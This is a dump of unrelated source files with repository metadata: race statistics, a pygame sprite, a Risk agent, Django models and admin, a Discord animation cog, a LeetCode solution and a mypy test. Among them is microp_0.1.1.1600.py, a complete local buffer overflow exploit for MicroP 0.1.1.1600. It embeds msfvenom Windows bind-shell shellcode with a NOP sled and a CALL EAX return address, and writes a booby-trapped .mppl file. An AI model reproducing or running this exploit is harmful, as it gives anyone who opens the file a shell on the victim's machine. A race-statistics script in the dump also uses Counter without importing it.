from horse_parser import HorseParser
from race_parser import RaceParser
from horse_parser_no_handicaps import HorseParserNoHandicaps
from race_parser_no_handicaps import RaceParserNoHandicaps
''' Computes the number of races in the dataset for which the dataset contains the records of all participating horses '''
def no_of_races_with_all_horses(races):
total_races = 0
for r in races:
if len(races[r].horses) == races[r].no_of_runners:
total_races += 1
return total_races
''' Computes the number of races in the dataset for which the dataset contains the record of the winning horse '''
def no_of_races_with_winner(races, horses):
total_races = 0
for r in races:
        # membership test instead of indexing, so a missing winner record
        # cannot raise KeyError (the point is to count when it is present)
        if races[r].winner and races[r].winner in horses:
total_races += 1
return total_races
''' Computes the average number of races per horse within the dataset '''
def average_no_of_races_per_horse(horses):
total_races = 0
for h in horses:
total_races += len(horses[h].races)
average_races = float(total_races)/len(horses)
return average_races
''' Returns the races which contain the records of all horses in the dataset '''
def get_full_races(races):
full_races = {}
for r in races:
if len(races[r].horses) == races[r].no_of_runners:
full_races[races[r].race_key] = races[r]
return full_races
''' Computes the ages of horses in races where all horse records are present in the dataset '''
def get_ages(full_races):
ages = set()
for r in full_races:
for h in full_races[r].horses:
ages.add(h.age)
return ages
''' Computes the number of races for horses at each age. Only takes into account those races which have all runners '''
def races_at_each_age(full_races, ages_set):
no_of_races_per_age = Counter()
for a in ages_set:
total_races = 0
for r in full_races:
ages = [h.age for h in full_races[r].horses]
if max(ages) == a:
total_races += 1
no_of_races_per_age[a] = total_races
return no_of_races_per_age
''' Computes the number of races with k missing horses in the dataset '''
def races_with_k_missing_runners(races):
races_with_missing_horses = Counter()
for r in races:
missing_runners = races[r].no_of_runners - len(races[r].horses)
races_with_missing_horses[missing_runners] += 1
return races_with_missing_horses
''' Computes the frequency of races with k horses participating '''
def races_with_k_runners(races):
races_with_k_horses = Counter()
for r in races:
races_with_k_horses[races[r].no_of_runners] += 1
return races_with_k_horses
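# Illustrative output (made-up counts): races_with_k_runners(races) ->
# Counter({8: 412, 10: 301, 12: 97}) -- keys are field sizes, values are
# how many races had that many declared runners.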
#''' Computes the number of races which contain the information for the winning horse '''
'''
def races_with_winning_horse(races):
races_with_winner = 0
for r in races:
for h in races[r].horses:
if races[r].winner == h.horse_key:
races_with_winner += 1
return races_with_winner
'''
def main():
horse_parser_98 = HorseParser('./../Data/born98.csv')
horse_parser_05 = HorseParser('./../Data/born05.csv')
race_parser_98 = RaceParser('./../Data/born98.csv')
race_parser_05 = RaceParser('./../Data/born05.csv')
horse_parser_no_handicaps_98 = HorseParserNoHandicaps('./../Data/born98.csv')
horse_parser_no_handicaps_05 = HorseParserNoHandicaps('./../Data/born05.csv')
race_parser_no_handicaps_98 = RaceParserNoHandicaps('./../Data/born98.csv')
race_parser_no_handicaps_05 = RaceParserNoHandicaps('./../Data/born05.csv')
horses98 = horse_parser_98.horses
horses05 = horse_parser_05.horses
races98 = race_parser_98.races
races05 = race_parser_05.races
full_races_98 = get_full_races(races98)
full_races_05 = get_full_races(races05)
total_races_with_all_horses_98 = no_of_races_with_all_horses(races98)
total_races_with_winners_98 = no_of_races_with_winner(races98, horses98)
total_races_with_all_horses_05 = no_of_races_with_all_horses(races05)
total_races_with_winners_05 = no_of_races_with_winner(races05, horses05)
average_races_per_horse_98 = average_no_of_races_per_horse(horses98)
average_races_per_horse_05 = average_no_of_races_per_horse(horses05)
ages98 = get_ages(full_races_98)
ages05 = get_ages(full_races_05)
no_of_races_per_age_98 = races_at_each_age(full_races_98, ages98)
no_of_races_per_age_05 = races_at_each_age(full_races_05, ages05)
races_with_k_missing_horses_98 = races_with_k_missing_runners(races98)
races_with_k_missing_horses_05 = races_with_k_missing_runners(races05)
print 'born98.csv file statistics:'
print 'No. of horses: ' + str(len(horses98))
print 'No. of races: ' + str(len(races98))
print 'No. of races for which we have all the horses: ' + str(total_races_with_all_horses_98)
print 'No. of races for which we have the winner: ' + str(total_races_with_winners_98)
print 'Fraction of races for which we have all the horses: ' + str(float(total_races_with_all_horses_98)/len(races98))
print 'Fraction of races for which we have the winner: ' + str(float(total_races_with_winners_98)/len(races98))
print 'Average no. of races per horse: ' + str(average_races_per_horse_98)
print 'No. of races for horses at each age: ' + str(no_of_races_per_age_98)
print 'No. of races with k-missing horse records: ' + str(races_with_k_missing_horses_98)
print 'No. of horse records with comptime missing: ' + str(horse_parser_98.comptime_missing)
print 'No. of race records with comptime missing: ' + str(race_parser_98.comptime_missing)
print 'No. of horse records with Irish race class: ' + str(horse_parser_98.irish_races)
print 'No. of race records with Irish race class ' + str(race_parser_98.irish_races)
    # the original left this value blank; the no-handicap parser's race count is the assumed intent
    print 'No. of races without handicap races: ' + str(len(race_parser_no_handicaps_98.races))
print ''
print 'born05.csv file statistics:'
print 'No. of horses: ' + str(len(horses05))
print 'No. of races: ' + str(len(races05))
print 'No. of races for which we have all the horses: ' + str(total_races_with_all_horses_05)
print 'No. of races for which we have the winner: ' + str(total_races_with_winners_05)
print 'Fraction of races for which we have all the horses: ' + str(float(total_races_with_all_horses_05)/len(races05))
print 'Fraction of races for which we have the winner: ' + str(float(total_races_with_winners_05)/len(races05))
print 'Average no. of races per horse: ' + str(average_races_per_horse_05)
print 'No. of races for horses at each age: ' + str(no_of_races_per_age_05)
print 'No. of races with k-missing horse records: ' + str(races_with_k_missing_horses_05)
print 'No. of horse records with comptime missing: ' + str(horse_parser_05.comptime_missing)
print 'No. of race records with comptime missing: ' + str(race_parser_05.comptime_missing)
print 'No. of horse records with Irish race class: ' + str(horse_parser_05.irish_races)
print 'No. of race records with Irish race class ' + str(race_parser_05.irish_races)
if __name__ == "__main__":
main() | [
"[email protected]"
] | |
63eb70fb3cfef92dc7a6799ef66587b91f5e6b14 | 2f380e7ebe2e0b05c1c487949f999b4d138702bb | /recurse_limit/merge_sd_preds.py | e680ed265ac489e52246fdc31a06a690029479d9 | [] | no_license | fdamani/mol-edit | 9ab09b63957d1aaa0ad31302bc7ebb21f72dafe3 | ec40f15d6092dd6c46f42f4099635e8d5682ab10 | refs/heads/master | 2021-02-16T19:44:15.475348 | 2020-03-05T20:52:01 | 2020-03-05T20:52:01 | 245,039,275 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 620 | py | import numpy as np
import pandas as pd
import sys
from IPython import embed
import os
input_dir1 = sys.argv[1]
input_dir2 = sys.argv[2]
input_dir3 = sys.argv[3]
#input_dir4 = sys.argv[4]
output_dir = sys.argv[4]
combined_dat = []
dirs = [input_dir1, input_dir2, input_dir3]#, input_dir4]
for dr in dirs:
for file in os.listdir(dr):
try:
combined_dat.append(pd.read_csv(dr+'/'+file, header=None, skip_blank_lines=False))
		except Exception as e:
			# name the failing file instead of silently swallowing every error
			print('error reading %s: %s' % (dr + '/' + file, e))
continue
combined_dat = pd.concat(combined_dat,axis=1).stack(dropna=False)
combined_dat.to_csv(output_dir+'/stochastic_decoding_qed.csv',header=None,index=None) | [
"[email protected]"
] | |
701aefc8f95457861896fba7777ce18a28630e0f | a6a08c80ee1ada28bc6ad0371065ce7c13c9331b | /player.py | 282ae5da659b1ba24aa54d6f67eed4af6ee153e5 | [] | no_license | khatangatao/networkTutorial1 | 3a2a9658c1b3cafb3755384c4bb866ec2de69f2f | e77f0248d6c4e97a1cd52ec215a7b85fe3de50fe | refs/heads/master | 2020-05-15T11:44:49.311028 | 2019-08-28T08:06:18 | 2019-08-28T08:06:18 | 182,242,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 813 | py | import pygame
class Player():
def __init__(self, x, y, width, height, color):
self.x = x
self.y = y
self.width = width
self.height = height
self.color = color
self.rect = (x, y, width, height)
self.vel = 3
def draw(self, win):
"""draw rectange to the screen"""
pygame.draw.rect(win, self.color, self.rect)
def move(self):
keys = pygame.key.get_pressed()
if keys[pygame.K_LEFT]:
self.x -= self.vel
if keys[pygame.K_RIGHT]:
self.x += self.vel
if keys[pygame.K_UP]:
self.y -= self.vel
if keys[pygame.K_DOWN]:
self.y += self.vel
self.update()
def update(self):
self.rect = (self.x, self.y, self.width, self.height)
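# Minimal usage sketch (assumes a pygame display surface `win` and a running
# event loop that calls these once per frame):
#   p = Player(50, 50, 40, 60, (0, 0, 255))
#   p.move()
#   p.draw(win)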
| [
"[email protected]"
] | |
3b151832899d2bcaf4adc33fa0a46a3e5f0486db | d93fe0484fc3b32c8fd9b33cc66cfd636a148ec4 | /AtCoder/ARC105/probD.py | 8f5eb20fda413d72ad9dd38d8820d4c345789e27 | [] | no_license | wattaihei/ProgrammingContest | 0d34f42f60fa6693e04c933c978527ffaddceda7 | c26de8d42790651aaee56df0956e0b206d1cceb4 | refs/heads/master | 2023-04-22T19:43:43.394907 | 2021-05-02T13:05:21 | 2021-05-02T13:05:21 | 264,400,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 400 | py | import sys
input = sys.stdin.buffer.readline
from collections import Counter
def canWinFirst(N, A):
if N%2 == 1:
return False
C = Counter(A)
for c in C.values():
if c%2 != 0:
return True
return False
Q = int(input())
for _ in range(Q):
N = int(input())
A = list(map(int, input().split()))
print("First" if canWiFirst(N, A) else "Second") | [
"[email protected]"
] | |
f0cf8fc30761652463b3ecce7ac92d9b03320a58 | bffaba2184f883876a41a13d17625df951b3c37a | /windows/x86/local/microp_0.1.1.1600/microp_0.1.1.1600.py | cb387a21f58cf3ff5777730beb3a0f4f59dfb6c3 | [] | no_license | VoidSec/Exploit-Development | 5d99e2c784f5d12b4020aea23cda7de33bd51486 | d75e6b336f2239b85fb2da7a537ffc0647ef497d | refs/heads/master | 2023-06-23T16:26:33.337107 | 2023-06-22T20:49:44 | 2023-06-22T20:49:44 | 180,751,769 | 165 | 38 | null | 2022-05-23T18:15:24 | 2019-04-11T08:47:31 | Python | UTF-8 | Python | false | false | 2,308 | py | """
Full title: MicroP 0.1.1.1600 Local Stack Buffer Overflow
Exploit Author: Paolo Stagno - [email protected] - https://voidsec.com
Vendor Homepage: http://sourceforge.net/projects/microp/
Version: MicroP 0.1.1.1600
Tested on: Windows XP SP3
Category: local exploit
Platform: windows
"""
#!/usr/bin/python
# EAX is pointing to buffer instead of ESP
# Follow EAX in dump, go to location MEM addr + A (junk) offset (in hex)
# see where the pattern is corrupted
file=open("exploit.mppl","wb")
#badchar \x00\x0a\x0d
#msfvenom -p windows/shell_bind_tcp -f c -a x86 -b "\x00\x0a\x0d"
shellcode=("\xdb\xc4\xba\x79\x94\x98\xcc\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x53\x31\x56\x17\x83\xc6\x04\x03\x2f\x87\x7a\x39\x33\x4f\xf8"
"\xc2\xcb\x90\x9d\x4b\x2e\xa1\x9d\x28\x3b\x92\x2d\x3a\x69\x1f"
"\xc5\x6e\x99\x94\xab\xa6\xae\x1d\x01\x91\x81\x9e\x3a\xe1\x80"
"\x1c\x41\x36\x62\x1c\x8a\x4b\x63\x59\xf7\xa6\x31\x32\x73\x14"
"\xa5\x37\xc9\xa5\x4e\x0b\xdf\xad\xb3\xdc\xde\x9c\x62\x56\xb9"
"\x3e\x85\xbb\xb1\x76\x9d\xd8\xfc\xc1\x16\x2a\x8a\xd3\xfe\x62"
"\x73\x7f\x3f\x4b\x86\x81\x78\x6c\x79\xf4\x70\x8e\x04\x0f\x47"
"\xec\xd2\x9a\x53\x56\x90\x3d\xbf\x66\x75\xdb\x34\x64\x32\xaf"
"\x12\x69\xc5\x7c\x29\x95\x4e\x83\xfd\x1f\x14\xa0\xd9\x44\xce"
"\xc9\x78\x21\xa1\xf6\x9a\x8a\x1e\x53\xd1\x27\x4a\xee\xb8\x2f"
"\xbf\xc3\x42\xb0\xd7\x54\x31\x82\x78\xcf\xdd\xae\xf1\xc9\x1a"
"\xd0\x2b\xad\xb4\x2f\xd4\xce\x9d\xeb\x80\x9e\xb5\xda\xa8\x74"
"\x45\xe2\x7c\xe0\x4d\x45\x2f\x17\xb0\x35\x9f\x97\x1a\xde\xf5"
"\x17\x45\xfe\xf5\xfd\xee\x97\x0b\xfe\x01\x34\x85\x18\x4b\xd4"
"\xc3\xb3\xe3\x16\x30\x0c\x94\x69\x12\x24\x32\x21\x74\xf3\x3d"
"\xb2\x52\x53\xa9\x39\xb1\x67\xc8\x3d\x9c\xcf\x9d\xaa\x6a\x9e"
"\xec\x4b\x6a\x8b\x86\xe8\xf9\x50\x56\x66\xe2\xce\x01\x2f\xd4"
"\x06\xc7\xdd\x4f\xb1\xf5\x1f\x09\xfa\xbd\xfb\xea\x05\x3c\x89"
"\x57\x22\x2e\x57\x57\x6e\x1a\x07\x0e\x38\xf4\xe1\xf8\x8a\xae"
"\xbb\x57\x45\x26\x3d\x94\x56\x30\x42\xf1\x20\xdc\xf3\xac\x74"
"\xe3\x3c\x39\x71\x9c\x20\xd9\x7e\x77\xe1\xe9\x34\xd5\x40\x62"
"\x91\x8c\xd0\xef\x22\x7b\x16\x16\xa1\x89\xe7\xed\xb9\xf8\xe2"
"\xaa\x7d\x11\x9f\xa3\xeb\x15\x0c\xc3\x39")
#|NOP sled|shellcode|NOP padding|CALL EAX
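# Layout note: 24 NOP bytes + shellcode, NOP-padded to 1276 bytes total, then
# the 4-byte address 0x0042DB4D (the CALL EAX gadget, written little-endian below).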
buffer="\x90"*24
buffer+=shellcode
buffer+="\x90"*(1276-len(buffer))
buffer+="\x4D\xDB\x42\x00"# we should call eax/jmp eax instead of esp 0042DB4D
file.write(buffer)
file.close() | [
"[email protected]"
] | |
a9aae50245008966f6aaa8ec8c393a6dbb8e88e1 | 127fa3dd454434b4c7526afe161177af2e10226e | /leetcode/20. Valid Parentheses.py | f68d5676ff6db745443ab6507617aa5be571ebf7 | [] | no_license | lunar-r/sword-to-offer-python | 966c46a8ddcff8ce5c95697638c988d83da3beab | fab4c341486e872fb2926d1b6d50499d55e76a4a | refs/heads/master | 2023-04-18T18:57:12.126441 | 2020-11-29T09:51:23 | 2020-11-29T09:51:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,771 | py | # -*- coding: utf-8 -*-
"""
File Name: 20. Valid Parentheses
Description :
Author : simon
date: 19-3-23
"""
"""
Idea: keep deleting adjacent '()', '[]', '{}' pairs until the string becomes
empty (valid) or no more pairs can be removed (invalid).
"""
class Solution(object):
def isValid(self, s):
"""
:type s: str
:rtype: bool
"""
if not s:
return True
if len(s)%2:
return False
s = list(s)
for _ in range(len(s)//2):
i = 0
while i < len(s):
if i+1 < len(s) and s[i] + s[i+1] in ['()', '[]', '{}']:
s.remove(s[i])
s.remove(s[i])
else:
i += 1
return s == []
"""
Official solution:
Scan the symbols from left to right.
Push every opening bracket onto a stack.
When a closing bracket appears, pop the top of the stack;
the popped element must form a matching pair with it.
Reading a valid string left to right, the bracket opened last
is always the one closed first; that last-in, first-out
behaviour is exactly what a stack models.
"""
class Solution_(object):
def isValid(self, s):
"""
:type s: str
:rtype: bool
"""
left = []
right2left = { ")": "(",
"}": "{",
"]": "["}
for char in s:
            if char in right2left:  # closing bracket: pop the stack and check it matches
top_element = left.pop() if left else '#'
if right2left[char] != top_element:
return False
            else:  # opening bracket: push it and wait for its match
left.append(char)
return not left
test = '({[[]]})'
solu = Solution()
print(solu.isValid(test)) | [
"[email protected]"
] | |
85a88417b4dc336d32fb32864d4d54540c01bd63 | b956e5f659f5045489a87fee8f1d6db778ac3d87 | /riskGame/classes/agent/agent.py | f97b5c67514ca8000a65a2e77c90c240032a4004 | [
"MIT"
] | permissive | AmrHendy/risk-game | 5599864444cc1feda706f20988d744acd9222184 | c7f9ac86de6118e6522ae3c60b36b914fafad946 | refs/heads/master | 2020-04-11T12:28:29.581768 | 2019-01-04T23:48:11 | 2019-01-04T23:48:11 | 161,781,452 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,148 | py | from riskGame.classes.state.move import Move
from copy import deepcopy
class Agent:
def __init__(self, place_bonus_heuristic, move_heuristic, attack_heuristic):
self._place_bonus_heuristic = place_bonus_heuristic
self._move_heuristic = move_heuristic
self._attack_heuristic = attack_heuristic
# move is None in all agents unless in case of human it will be not None
def play(self, current_state, move=None):
if move:
state = current_state
else:
state = deepcopy(current_state)
if move is None:
move = Move()
if self._place_bonus_heuristic is not None:
move = self._place_bonus_heuristic.make_decision(state, move)
if self._move_heuristic is not None:
move = self._move_heuristic.make_decision(state, move)
if self._attack_heuristic is not None:
move = self._attack_heuristic.make_decision(state, move)
move.apply_move()
state.increase_turn()
state.increase_player_turn()
state.set_parent_state(current_state)
return state
| [
"[email protected]"
] | |
77da6860684dfce2ec7fcfdf14c2655de8344b36 | af4baf0c9daf95996334ea83b33d6a360eb352bc | /cogs/Anim.py | 9e0a0b4b4b61316e2e68915fe9522b1bc4e52a20 | [] | no_license | EC-discord/TestBotEC | f16af106846f1d510a5a927b4046432242645389 | 7b12ab2943899f28fb52b1923f1cd15a4f0c653e | refs/heads/master | 2021-06-04T04:33:33.187612 | 2020-06-13T16:27:34 | 2020-06-13T16:27:34 | 109,504,954 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,234 | py | import discord
import asyncio
from discord.ext import commands
class Anim(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def cathi(self, ctx):
msg = await ctx.send("""ຸ _____
/ / /|"
| ̄ ̄ ̄ ̄| |
| |/
 ̄ ̄ ̄ ̄""")
await asyncio.sleep(1.3)
await msg.edit(content="""ຸ Hi...♡
∧_∧__
/(´・ω・`) /\
/| ̄ ̄ ̄ ̄|\/
| |/
 ̄ ̄ ̄ ̄""")
await asyncio.sleep(1.3)
        for i in range(1, 6):
await msg.edit(content="""ຸ _____
/ / /|"
| ̄ ̄ ̄ ̄| |
| |/
 ̄ ̄ ̄ ̄""")
await asyncio.sleep(1.3)
await msg.edit(content="""ຸ Hi...♡
∧_∧__
/(´・ω・`) /\
/| ̄ ̄ ̄ ̄|\/
| |/
 ̄ ̄ ̄ ̄""")
await asyncio.sleep(1.3)
@commands.command()
async def catsu(self, ctx):
msg = await ctx.send("""{ | | }
( ^ - ^ )
( u u )~""")
await asyncio.sleep(1)
await msg.edit(content="""{ \ / }
( ^ - ^ )
( u u )~""")
await asyncio.sleep(1)
for i in range(1, 10, 1):
await msg.edit(content="""{ | | }
( ^ - ^ )
( u u )~""")
await asyncio.sleep(1)
await msg.edit(content="""{ \ / }
( ^ - ^ )
( u u )~""")
await asyncio.sleep(1)
@commands.command()
    async def virus(self, ctx, member : discord.Member = None, *, virus : str = "trojan horse"):
        # default to the command invoker so member.name below cannot fail on None
        if member is None:
            member = ctx.author
wheelList = ['/', '-', '\\', '|']
wheelIter = iter(wheelList)
msg = await ctx.send('`Preparing virus`')
for i in range(2, 17, 2):
try:
wheel = next(wheelIter)
except StopIteration:
wheelIter = iter(wheelList)
wheel = next(wheelIter)
await msg.edit(content=f"`[{('▓' * i).ljust(16)}] {wheel} {virus}-virus.exe Packing files.`")
await asyncio.sleep(1)
await msg.edit(content=f"`Injecting virus. |`")
await asyncio.sleep(1)
await msg.edit(content=f"`Injecting virus.. /`")
await asyncio.sleep(1)
await msg.edit(content=f"`Injecting virus... -`")
await asyncio.sleep(1)
await msg.edit(content=f"`Successfully Injected {virus}-virus.exe into {member.name}`")
    @commands.command()
    async def boom(self, ctx):
        # bug fix: `message` was referenced below but never defined, and the
        # command decorator was missing; send the initial countdown message
        # here (the exact starting text is assumed)
        message = await ctx.send("`THIS MESSAGE WILL SELF DESTRUCT IN 5`")
for c in range(5, -1, -1):
await message.edit(content=f"`THIS MESSAGE WILL SELF DESTRUCT IN {c}`")
await asyncio.sleep(1)
await message.edit(content="💣")
await asyncio.sleep(1)
await message.edit(content="💥")
@commands.command()
async def table(self, ctx):
m = await ctx.send(content="`(\°-°)\ ┬─┬`")
await asyncio.sleep(1)
await m.edit(content="`(\°□°)\ ┬─┬`")
await asyncio.sleep(1)
await m.edit(content="`(-°□°)- ┬─┬`")
await asyncio.sleep(1)
await m.edit(content="`(╯°□°)╯ ┬─┬`")
await asyncio.sleep(1)
wheelList = [']', '┻━┻', '[', '┬─┬']
wheelIter = iter(wheelList)
for i in range(7, 39, 4):
try:
wheel = next(wheelIter)
except StopIteration:
wheelIter = iter(wheelList)
wheel = next(wheelIter)
await m.edit(content=f"`(\°-°)\{(i * ' ')}{wheel}`")
await asyncio.sleep(1)
@commands.command()
async def warning(self, ctx):
msg = await ctx.send("`LOAD !! WARNING !! SYSTEM OVER`")
await asyncio.sleep(1)
await msg.edit(content="`OAD !! WARNING !! SYSTEM OVERL`")
await asyncio.sleep(1)
await msg.edit(content="`AD !! WARNING !! SYSTEM OVERLO`")
await asyncio.sleep(1)
await msg.edit(content="`D !! WARNING !! SYSTEM OVERLOA`")
await asyncio.sleep(1)
await msg.edit(content="`! WARNING !! SYSTEM OVERLOAD !`")
await asyncio.sleep(1)
await msg.edit(content="`WARNING !! SYSTEM OVERLOAD !!`")
await asyncio.sleep(1)
await msg.edit(content="`ARNING !! SYSTEM OVERLOAD !! W`")
await asyncio.sleep(1)
await msg.edit(content="`RNING !! SYSTEM OVERLOAD !! WA`")
await asyncio.sleep(1)
await msg.edit(content="`NING !! SYSTEM OVERLOAD !! WAR`")
await asyncio.sleep(1)
await msg.edit(content="`ING !! SYSTEM OVERLOAD !! WARN`")
await asyncio.sleep(1)
await msg.edit(content="`NG !! SYSTEM OVERLOAD !! WARNI`")
await asyncio.sleep(1)
await msg.edit(content="`G !! SYSTEM OVERLOAD !! WARNIN`")
await asyncio.sleep(1)
await msg.edit(content="`!! SYSTEM OVERLOAD !! WARNING`")
await asyncio.sleep(1)
await msg.edit(content="`! SYSTEM OVERLOAD !! WARNING !`")
await asyncio.sleep(1)
await msg.edit(content="`SYSTEM OVERLOAD !! WARNING !!`")
await asyncio.sleep(1)
await msg.edit(content="`IMMINENT SHUT-DOWN IN 0.5 SEC!`")
await asyncio.sleep(1)
await msg.edit(content="`WARNING !! SYSTEM OVERLOAD !!`")
await asyncio.sleep(1)
await msg.edit(content="`IMMINENT SHUT-DOWN IN 0.2 SEC!`")
await asyncio.sleep(1)
await msg.edit(content="`SYSTEM OVERLOAD !! WARNING !!`")
await asyncio.sleep(1)
await msg.edit(content="`IMMINENT SHUT-DOWN IN 0.01 SEC!`")
await asyncio.sleep(1)
await msg.edit(content="`SHUT-DOWN EXIT ERROR ¯\\(。・益・)/¯`")
await asyncio.sleep(1)
await msg.edit(content="`CTRL + R FOR MANUAL OVERRIDE..`")
@commands.command()
async def woah(self, ctx):
m = await ctx.send("( ' O ')")
await asyncio.sleep(1)
await m.edit(content="( ' O ' )")
await asyncio.sleep(1)
await m.edit(content="( ' O ' )")
await asyncio.sleep(1)
await m.edit(content="(' O ' )")
await asyncio.sleep(1)
await m.edit(content="( ' O ' )")
await asyncio.sleep(1)
await m.edit(content="( ' O ' )")
await asyncio.sleep(1)
await m.edit(content="( ' O ')")
@commands.command()
async def deadchat(self, ctx):
msg = await ctx.send('DEAD CHAT')
wheelList = ['T DEAD CHA', 'AT DEAD CH', 'HAT DEAD C', 'CHAT DEAD', 'D CHAT DEA', 'AD CHAT DE', 'EAD CHAT D', 'DEAD CHAT']
wheelIter = iter(wheelList)
for i in range(1, 10, 1):
try:
wheel = next(wheelIter)
except StopIteration:
wheelIter = iter(wheelList)
wheel = next(wheelIter)
await msg.edit(content=f"`{wheel}`")
await asyncio.sleep(1)
def setup(bot):
bot.add_cog(Anim(bot))
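# Load this cog with bot.load_extension("cogs.Anim") (module path assumed from
# the repository layout).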
| [
"[email protected]"
] | |
c88d91a684760a70db45c13dfa401b805fb99304 | bef2720e24999b2a923fa27207afe16b3fc5e71f | /Labs2/Lab5.py | 9210f60e10722c4309ba4e7b198e8c4833731a7c | [] | no_license | justineyerly/it3038c-scripts | e28173f5cd25f89ec5c5fd7adea8a2fbba9c9312 | 82e781418cc017d092aac97ea5f631c03db9f05a | refs/heads/master | 2022-07-10T14:44:58.455083 | 2020-04-30T01:27:58 | 2020-04-30T01:27:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,176 | py | import random
numberofGuesses = 0
number = random.randint(1,100)
print("Hello! What is your name?")
name = input()
print('Welcome, ' +name +"! You're going to play a number guessing game. You must guess a number between 1 and 100. Can you do it in what? 10 tries? Ready. Go!")
while numberofGuesses < 10:
print('Take a Guess!')
guess = input()
guess = int(guess)
numberofGuesses = numberofGuesses + 1
guessesLeft = 10 - numberofGuesses
if guess < number:
print("Your guess is too low. Please try again")
print("You also have %s guesses left, so guess wisely!" % guessesLeft)
if guess > number:
print("Your guess is too High. Please try again")
print("You also have %s guesses left, so guess wisely!" % guessesLeft)
    # (the original checked `numberofGuesses == 0` here, which can never be
    # true after incrementing; running out of guesses is reported after the loop)
if guess == number:
break
if guess == number:
print("Good Job, " +name +"! You guessed the number in %s tries!" % numberofGuesses)
if guess != number:
print("Sorry! The number I had in mind was %s . Try playing again!" % number) | [
"[email protected]"
] | |
3a65a7ae36bc8dee8927515ec8b2f97f90ff8da3 | 17c6673dfa35cdc053d51415ed565101d9c1f30e | /recipe_app/migrations/0001_initial.py | 3978b663233d60bab34db1bdc360ea917a4b3324 | [] | no_license | jodi08/recipe_box | a7a5a6ec4ee5926c729285a51b83bcaa63c15f3a | 562c847dd2bd8cf88bd2e0c7364a27224606db85 | refs/heads/dev | 2022-12-12T04:24:27.419874 | 2020-08-07T21:18:49 | 2020-08-07T21:18:49 | 285,696,017 | 0 | 1 | null | 2020-09-12T04:01:52 | 2020-08-07T00:02:16 | Python | UTF-8 | Python | false | false | 1,134 | py | # Generated by Django 3.1 on 2020-08-07 14:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=80)),
('bio', models.TextField()),
],
),
migrations.CreateModel(
name='Recipes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50)),
('description', models.TextField()),
('time_required', models.CharField(max_length=25)),
('instructions', models.TextField()),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='recipe_app.author')),
],
),
]
| [
"[email protected]"
] | |
f30701bd492a4102d4f2a33e2bbda3effb1a234b | 5a64bd2d0fe5b9af737fe8844957e92ab7412bc1 | /accounts/admin.py | fc6c33c480fb72d31fff80537a09857c7b0e72a3 | [] | no_license | ishimwe-samuel/vmis_python | 5b19b3b2bfc881853d0a5aee0fd105664fb4e648 | 054584d199f4da3ca24bd6ca96ed52d68218b8fd | refs/heads/master | 2023-02-23T15:08:16.905002 | 2021-01-31T21:23:31 | 2021-01-31T21:23:31 | 334,760,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,576 | py | from django.contrib import admin
from .models import User
from .forms import UserAdminCreationForm, UserAdminChangeForm
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
class UserAdmin(BaseUserAdmin):
# The forms to add and change user instances
form = UserAdminChangeForm
add_form = UserAdminCreationForm
# The fields to be used in displaying the User model.
# These override the definitions on the base UserAdmin
# that reference specific fields on auth.User.
# list_display = ('email', 'is_admin')
list_display = ('email', 'username', 'orgunitname',
'orgunitlevel', 'parentorgunitname',)
list_filter = ('is_admin',)
fieldsets = (
(None, {'fields': ('email', 'password')}),
('Personal info', {'fields': ('username', 'surname', 'phone_number',
'orgunitid', 'orgunitname', 'orgunitlevel', 'parentorgunitid', 'parentorgunitname',)}),
('Permissions', {'fields': ('is_admin', 'is_active',)}),
)
# add_fieldsets is not a standard ModelAdmin attribute. UserAdmin
# overrides get_fieldsets to use this attribute when creating a user.
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'username', 'surname', 'phone_number', 'orgunitid', 'orgunitname', 'orgunitlevel', 'parentorgunitid', 'parentorgunitname', 'password1', 'password2')}
),
)
search_fields = ('email',)
ordering = ('email',)
filter_horizontal = ()
admin.site.register(User, UserAdmin)
| [
"[email protected]"
] | |
a12b64c5884c334a29924be461c7346f4857dbbe | 251c70bd53ce6c499b011590c2f73632696d950f | /virtual/lib/python3.6/site-packages/mypy/test/teststubgen.py | 3566f03fb9a1497dc33226a715cc846110889d3f | [
"MIT"
] | permissive | EduardoPessanha/Git-Python | ef09e404641fb988817c995bdf607c1860bf0622 | 87aa10af09510469032732ed2c55d0d65eb4c1d6 | refs/heads/master | 2023-01-25T01:10:51.089507 | 2020-12-03T12:27:44 | 2020-12-03T12:27:44 | 296,760,423 | 0 | 0 | MIT | 2020-09-28T03:37:14 | 2020-09-19T01:04:33 | Python | UTF-8 | Python | false | false | 34,973 | py | import io
import os.path
import shutil
import sys
import tempfile
import re
import unittest
from types import ModuleType
from typing import Any, List, Tuple, Optional
from mypy.test.helpers import (
assert_equal, assert_string_arrays_equal, local_sys_path_set
)
from mypy.test.data import DataSuite, DataDrivenTestCase
from mypy.errors import CompileError
from mypy.stubgen import (
generate_stubs, parse_options, Options, collect_build_targets,
mypy_options, is_blacklisted_path, is_non_library_module
)
from mypy.stubutil import walk_packages, remove_misplaced_type_comments, common_dir_prefix
from mypy.stubgenc import (
generate_c_type_stub, infer_method_sig, generate_c_function_stub, generate_c_property_stub
)
from mypy.stubdoc import (
parse_signature, parse_all_signatures, build_signature, find_unique_signatures,
infer_sig_from_docstring, infer_prop_type_from_docstring, FunctionSig, ArgSig,
infer_arg_sig_from_anon_docstring, is_valid_type
)
from mypy.moduleinspect import ModuleInspect, InspectError
class StubgenCmdLineSuite(unittest.TestCase):
"""Test cases for processing command-line options and finding files."""
@unittest.skipIf(sys.platform == 'win32', "clean up fails on Windows")
def test_files_found(self) -> None:
current = os.getcwd()
with tempfile.TemporaryDirectory() as tmp:
try:
os.chdir(tmp)
